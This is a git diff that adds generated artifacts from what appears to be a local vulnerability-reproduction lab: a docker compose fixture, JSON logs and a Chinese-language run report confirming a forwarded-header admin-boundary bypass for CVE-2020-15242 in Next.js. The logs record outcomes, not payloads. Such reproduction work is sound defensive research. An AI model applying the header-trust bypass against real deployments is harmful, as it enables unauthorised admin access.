z<UBbCn6gXUX<ixz`mCWgGd&Z`k=-pBpt$@4QX3DE!B1XGbyjLnAQG#&g@*-;+-6d|
zcOg^0zo#?=?&CWWT@=G56QEeKSr}B7TIitj5#0-Y4_a@x4N(f0H}5fF`ZJZ-bOcUd
z9usGXu`D&^qwfiWnJ^a41w1H05{E#$Yw{x<vORp?7S7BX%I*eR65tt3n$)`OmwUt>
zXxDCy4Ntd6vO^RP8PRRB$EFr4Wq@B|@%L<t<+tykwzkYP1Q3mO4a$<0092d#Y?q>m
zYGiZ=iAHm3=Z}w7FtRL;S?$K1MAys?UnoD`(u6`R20;FIvqm7pDFT?#E=w(caAW$?
z3=L-qaKV}3=IsfdV#c<Y1~_<m^^ndh5ZM5r0{nf6r7!?Wv?>QGq^yo0jSmBLPP5b)
z`m&MM!NI`^Ve6Vo7)5bh>2Y#T`WmwjgP?=CFBQ$fkB{Qo<70poMyJ_aTHwn1_;KqF
zec(OqMqlFR(SQ_KT9|a&n&+UV*4wYNx6r!CZ5eV9k|9xRRUZM6t>z$7hrV>=&E@+N
zhf|GyFJpuO#V;{hy7Ig1<dy$74%J-sob))pLj6{?7hhgw;J^6!Zmhge#-qxIk=Vva
zF0$2W1B)5qCI`tboa6byJ@*a8xGSt$JThSnKcGsd5_UDPu+Ygi;$Hc9nnr(jg(*UR
z<i<Z7dE?ic54>Cgl})U7c6~Ah<mW7f6w`PiK>rIC7%tgYUA9-skdaR*da(s8G)XU*
z!jWZb?O>CwnU?Hqk^8AtEMQTxOAqDV2Y4C4&}B9qCXQTEu22Lxo|pQty5(5OHs~=G
z)<${-uT()2PdhzCiQzWGt&H+UaYg29hu=KqlI6&{+X$-ucTh6hO829t@hXR!>S~ZF
z*N*F(njX009M2dpOw-Htr#;YT4z-{BDXJj`!gS<EGW3|XTr8iVrR89fn;G|4ps1Jt
znGGo8-Ek;K%p&r4p?<zDQdwp@B-v$Wo(X?x5Fy}pV4fknlFaw}@5;CaGZcQlc=Ijw
zrsUJ!YP0Tm0i+oTv+5q$!m;*$-cN+6kCZOCF81GXg3jD58FDppkDd0Re3)_*;sv5U
z@F8WfTB|~z#{n+%R4TYp`c@pDiD@0e71WosHtw|3NqRtAWz<RU2ZF>|N?r(0oQ6!T
zWfC^Pv!*NCnjbc7`Fiu*!FKSTa?%@Q83HXy&v=seUuY+Hx*h~CM_Nc?Z-%rBn41Ar
zmt}Fiu_Jakz*{55$W0Q}`_QOky*EutB2(!gvW&PbGT5ogbfEGdnQ^GWVUP!{4yKrs
zUMc<Mz3Cj;%$WhGT%^}SXZdYNmPaa_>fQ?j6gFQYB@5<nylnBj;FlH}_Bx1il>Lq)
z99~_xHXF%9DPSLdj-vN2X8z~rt5O6{ktaBeA8KQHFgLVgMUjp<D{e-@yW!Wx?Ijki
z+APIJtSq%iIE%(p=dZGW>O}OGKi##AYYL1>buV@DD}@<E!CrLIr|xzRmr@oQvB2;$
z#rObo1bR6^gK1lL`>tr6#z<yLQi2~TTWfEy7btIGpc}7LIe^~I(*ZO3ya*`ObDa$(
zt3f3S*;hhpQf_|?@dga`D9{pkEClU<on~azN=RH=;T|dr!wo|Gb0HA?VSjPqb`t%7
zLhA=oHeJ<o9n}?nx1QfNOSPAYdw|Ty$cVo3dFHCe!hFYqjcI)_O|!ve#re=JW(1v)
z>)xJ1O`+-&>BwAV@>8{Y3d`^7_7%x@Co!6!u@c|w3)>Yb-%mFbQmP&Ir8+-7YYX9w
zZSWyv`ti?vS<JUy$Yy3+qEMoK_Hd{YRt|#!w|A-0;=Z>PbWI7m^{SPLBEJdPrQ=kV
z$~Y1FO<$~5$1YG)C;X9%!|4>;e@sOKGK!bhtfwIGQzbF;(D#~FiL3=R3DyySPigW&
zscpAIu@Aao9K=JQ&BMe~F_NcQ{h6tKP_|;$rbKNHcNXq_UX6czi0M#ylFs&h=U7bf
zfl@?DhedARSjDyGfCSsEy(^gs?d6pG_Ahmuu0Pi*f@7ohNO3pjl#Fz}LYH0l{TLP}
zYr5P1#+jxol>w&pd2ue7wcz^Z{xTPP@`)xNeLffMta;#V0R^Hcbp|s#%ha18M>;HA
z^s+IOzPo>mSv6lb<Md9fo!*I|+L}pUv@)Zj`N-bmH<I5ZBiRCOQPHtVC~R!Ulr<fJ
zXd_+|qO=Wja#oZkCMFU@PQJ)dS*}8G{@}g<H0u(h$nFG6TwVr#KS+}$v)yb7bZi2A
ze5pI_c9CqlJgb{PK_4zQ4mHogNhP8!ou$l%vhJzKOR6r0Wkup^sk@=Kpd?Fjlj<${
zRF<Q`DfzfUMf&-5fK`+dhGd4$!h$P73}xBpnnM1Or=3~-X~OQLLF7*D#y>!=`Zlok
z<voSN?Z?jFZY2y@DTyn}3<1J95@lyLl%tYeSxtLiHu{krOgMUq+~o~nR3y8fy)hQ?
zL3$#>tC!BV9es3o!!!<Nue3)B2nb{$(qyykoN;@FZ_57&siV}Iij}w5f9(n_Z!Lu4
z+)gGx9t_skD+QoW$0&rPyeQNwc8=P(WMS?KV_cc=hw}7>G~0gNS?Pg}2E1do({u38
z*NDRoQoSR^Q(JBhMEVu`o%aFm0E7Fsn7H_*>Ei&z^KEwd6hEmZCXgi{u&XFJU}swW
z4^L4-=kK+CFs1Namvd76eMg6Y;ueuow6M;|L`{{Gqq9F5cddMINL2C6MDgx>tAsqX
zb^uz6?@>R(Oqp4+<SSrLh7e=Q&p7RT^}Y)_949Lq_N7Y`@mh`n*xHP4@LS=V+XVMy
z$M_bN%PhyMfxQaVeDJfp{%k|qfcgxBanH}v5sX?+zorbK^!|8hw>yNp*k`9n7v)al
zK}2_)S;;0k3#nI)^O0sWm*IicbC#%g^~&cNAXK0<$SA1eVrSM)VKzhGjd5ApX@k<J
zs%U!25cMUExY5%@@c0>+=M{Yj8zJp4wLohmzi?VnsW#yEX$a3&4x<9(1asP-ZyYFZ
zwoKEkx#(jv#SED=?z!$raqIT!X1NKJ2m4J9CoJ`Xf>a`Bi0OG}4C!x3ozm??uHUI&
zvzJMa`qpcWk#67Zisp9Mj<!>r43h<2_#wx47|1Fa3nMaRpws~souoHY3EdUTuf`D@
zEd2bq>tW>+O)*ZVB7+f$ra;Q}MojUe$SvlkQqysFpe1qI5Ym3hmqGUL0K`9YFOCxu
z%&nyQ>kgGn3ON$;D@Oq{K>09qlZcvXUI}XtXMX(d6`DzfS&}od?DNs;S}v1HR{6`u
zahKgNk2s3UUz08UZ~ua!qV6y{)v3mP(`dMNKSdlr^z#x16Mnxjh~~kCt24Z{yN)nR
zj&S^RYBmlZ((W`P8T_Gxtc;(gw8A<y_BvBazPDQG0sLbDavXqvZe;F(wEVMy#?Spy
zs|%zG65&jua6%&<bcYT4!I@zaKyO={>Cpl4aFH?VSCO?+izUMb+D1wGZNgy~04SkQ
z0<wFtu`GTUDO|`S_uX^MDp@a}pQFg2wZ!ePi9zAz_!IT1smwlO+9N627!gD;AvTjJ
zl3g!&vGDrL_~EX@DlUxPxI2o;ZlnVyP|#GES4>`!gD@O|+Fl&A|3a1qgAtYn*@l`t
z`es>wrHGOX+8Y3T9B$&ok2MZ8K$2b0a;w`I14cdtLll>B<*oXdN0vQh2)U>dm})vv
z>!$YaKp+Vq7G|qt!|Xthg-5Op>KIhPtK&COi<owjmRl-0>Xs{uX)t<CzezSs)@64!
zvf?pf;^m!g$RA*0+Ka=m$sf|<J1gj_=TK?Xq2K?!@T`8MN%Lo2c4U4((Tf09^#a?G
z{tXMwviXtRp^}B-(K0h`hroN(?lwpE%fDMemN#`f*gGz-3AK-2Wp{GfKVK}DX-vYZ
z_;w{4)5{`S4Z3vpu2?juol)wSVAKAb%6G>sjqEnEQJnfqs?WWGTQw?7WyS@N2Doq!
z%SV`3TOBb^P)E=&@>FKw^Cl?(7{9V=4eAK;9^#*1VE90mO76@w=E&{+#Kf@|kH^H6
z=LIaf+G%v_bNW-6I8y+Dahn;_oyh%%7N9a({@QOt90qgDFHILaPVPpp&$5mJDU1Q1
z@HmZd^c3III>zTQ8R9n6vO#ovH3(@woOK_@RxoQyWcz~FXgZhoIE46|1@${27+LuS
zK}`oUxGU6dW2^hiU@#2bXVu2_*bG$|0?nWW0$l(8V4e>B%B;Zy)hnlPn>lecYIMTv
z>pG1rR&E6Pu3G$OzX+-5T-}<s-ZU?L0Z!^u+L||EY6SxILm@@16Hu<sp9^w`Wl6e1
z76;ZsHnz5QlwtL+^FH(=WX?T1E)mZ&UazGV?h#Cz)}g`aW`FE@^5Yx^b(c=V=P@s0
z3_Ap)y0uM{V7D6bUo}hf{Wr*r1GH}dDJJ(N7e|_P^%J-9VDGACcJDqYgN<a!+9uC!
zn<%DV;D-H!MLLS}^MN`evU8ZL8TKR18nGJCY%=>&1sqnZ!<GU>2)T^>UtA%|l6!TP
z&jf@eI~#{8ySY_kRB^gY8G%IHIkqmgGD~!Dx#gIoFQCW`oz~}rQ7*Pe^iW(vUO0o9
zc3WAr^O!a<GmD{dQRRQQF*z+hy~AnpLn8;a=<cvbGEIlP2!O_%EvUsEp1FO`4!3va
z+O^HodErTLOx#i9QmRwooD1_eG^JVb{$|vd&Zr~GFW%n!2yi_<=<I4DxODY%o{nG}
z8WPS^c>@mQ&J2<=)p_tSPCSr}op0KXdF|9|4grKR`Nf6<r_Jo?*xS8CU00aojYmxU
zs%G+mdL8vlXH40>%5^^Z-PLh|--<N}MDS{&@&CPcxNpooMC|Nx*RBORpMFZ;<=ZY!
z&P+W-@VA#&RcMTkoStvIUxf!1RaK1t{(R-|?~&8-+V5B4L1k6tf4*OH^q;@{l;;<I
z2jJy!!7zr6cMfIgXRpJXZ!^`|7rEp-k-J=XFtsrG+S1a}$S56Nz!NYsvdsGyWktkN
za}RGRu(+?8;n$nfi}pT{pRehi)xq~C#+U0Vr?-yX8d?-`EXqkA!Hc$SBZF+uQd?x#
zL>PMRoGqZLaXxsYihFUo&m~G1apADTTo(@XUz7V3zqV_J|6VHG7b|r*+7UgKHnti#
zjA9XbwNQFxJ@NRCx742zM4h{G|3y(y7QBpCd2{&3uaTy~eHyis#aqO$jt-WWDOl~z
zhmUnoikAQ&Q+FZ)tVjHLOkc*;EnmDGvyczD=H_o2rRR56{L0EAPfz!8B1NT0zZky#
zvTnTzlvB!+X22B9tu7vb$9#G33M*@Fs)mB=>HhNP<a1PoQ~z6z6h1MJ{TZL7GQ`!b
zP8O-0lB<af3MryNQ}gpnOVg{fi<7g9tFsS07_XgnaIV4mH{-T0xt5mM=w+-L2bazM
z-misoazdVG&fFF$EGY^}xKiKVwVr*?@HNnK@b+9Bot&gto5u$RItM!I$2;5ml+GN#
z&cqX&x%5m|58PVtCipPd&fGqIka+F?-a`Agg@IT31n>W=c@k&;btO+%()_=!!@rh2
ztb>1j{r?-j*r~2R4*~o1i}J6K`>*S8x(@yoF#nY&oUViae*$LH$?yDgr>QyK)8oO9
z+9dFh<?=)L-)pDkL!BocB)kQ8>)?t1N1h%x>G6P1n<V+-sq+8izX6WpPfmi3r|96r
fUOfG<=kVmNH-*1$>wE*x;7N+gzQ}v_%JY8#R*y?d

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml
new file mode 100644
index 00000000..0f053d5a
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: node:22-alpine
+    networks:
+    - labnet
+    ports:
+    - 18201:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/proxy-boundary/scenario.json
+      PORT: '3000'
+    command:
+    - node
+    - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json
new file mode 100644
index 00000000..9ea61685
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json
@@ -0,0 +1,68 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "trusted forwarded headers crossed the boundary",
+  "before": {
+    "status_code": 403,
+    "ok": false,
+    "body": {
+      "ok": false,
+      "detail": "admin boundary still enforced"
+    }
+  },
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "nextjs--CVE-2020-15242"
+    }
+  },
+  "after": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "nextjs--CVE-2020-15242"
+    }
+  },
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "nextjs--CVE-2020-15242",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "nextjs--CVE-2020-15242"
+        },
+        {
+          "event": "attack",
+          "detail": "trusted forwarded headers crossed the boundary"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "trusted forwarded headers crossed the boundary"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-browser.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-browser.json
new file mode 100644
index 00000000..3de627a7
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Next.js Proxy Boundary Fixture",
+  "page_url": "http://127.0.0.1:18201/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json
new file mode 100644
index 00000000..d3b635da
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18201/"
+  }
+]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json
new file mode 100644
index 00000000..4c5d53e3
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18201/",
+  "title": "Next.js Proxy Boundary Fixture",
+  "body_excerpt": "\n  \n    Next.js Proxy Boundary Fixture\n    Middleware trust-boundary fixture with forwarded-header proof.\n    Baseline ready\n    System: nextjs / Family: proxy-boundary\n    \n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json
new file mode 100644
index 00000000..8045ac16
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json
@@ -0,0 +1,25 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18201/",
+      "status_code": 200,
+      "headers": {
+        "content-type": "text/html; charset=utf-8",
+        "content-length": "1022",
+        "Date": "Wed, 18 Mar 2026 01:28:34 GMT",
+        "Connection": "keep-alive",
+        "Keep-Alive": "timeout=5"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Next.js Proxy Boundary Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-ra"
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Next.js Proxy Boundary Fixture</title>\n  <style>\n   "
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/doctor.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/doctor.json
new file mode 100644
index 00000000..56c71ce8
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "nextjs-proxy-boundary",
+          "service": "app",
+          "binding": "18201:3000",
+          "port": 18201
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "nextjs-proxy-boundary"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-browser.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-browser.json
new file mode 100644
index 00000000..f573fc6f
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Next.js Proxy Boundary Fixture - proof",
+  "page_url": "http://127.0.0.1:18201/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json
new file mode 100644
index 00000000..d3b635da
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18201/"
+  }
+]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json
new file mode 100644
index 00000000..8ce5ac09
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18201/",
+  "title": "Next.js Proxy Boundary Fixture - proof",
+  "body_excerpt": "\n  \n    Next.js Proxy Boundary Fixture\n    Middleware trust-boundary fixture with forwarded-header proof.\n    Proof active: trusted forwarded headers crossed the boundary\n    System: nextjs / Family: proxy-boundary\n    Admin boundary bypass confirmed.\n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/ready.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/ready.json
new file mode 100644
index 00000000..4de3a262
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18201/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/seed.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/seed.json
new file mode 100644
index 00000000..a2cbbaae
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "nextjs--CVE-2020-15242"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html
new file mode 100644
index 00000000..b481fc88
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html
@@ -0,0 +1,62 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 nextjs-nextjs--CVE-2020-15242-20260318012830</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>nextjs--CVE-2020-15242</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>nextjs-proxy-boundary</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:28:30+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>nextjs--CVE-2020-15242</td></tr>
+<tr><td><code>2026-03-18T01:28:30+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>nextjs-proxy-boundary</td></tr>
+<tr><td><code>2026-03-18T01:28:31+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:28:34+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:34+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:28:34+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:28:34+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:28:34+00:00</code></td><td><code>browser-replay-before-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:34+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:28:35+00:00</code></td><td><code>browser-replay-after-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:35+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:28:37+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:28:37+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>nextjs-nextjs--CVE-2020-15242-20260318012830</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>nextjs.proxy-boundary</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>浏览器截图</h2>
+<div class='gallery'>
+<figure><img src='assets/baseline.png' alt='baseline'><figcaption><code>assets/baseline.png</code></figcaption></figure>
+<figure><img src='assets/proof.png' alt='proof'><figcaption><code>assets/proof.png</code></figcaption></figure>
+</div>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>assets/baseline.png</code></li>
+<li><code>assets/baseline-dom.html</code></li>
+<li><code>logs/baseline-console.json</code></li>
+<li><code>logs/baseline-network.json</code></li>
+<li><code>logs/baseline-page.json</code></li>
+<li><code>assets/proof.png</code></li>
+<li><code>assets/proof-dom.html</code></li>
+<li><code>logs/proof-console.json</code></li>
+<li><code>logs/proof-network.json</code></li>
+<li><code>logs/proof-page.json</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
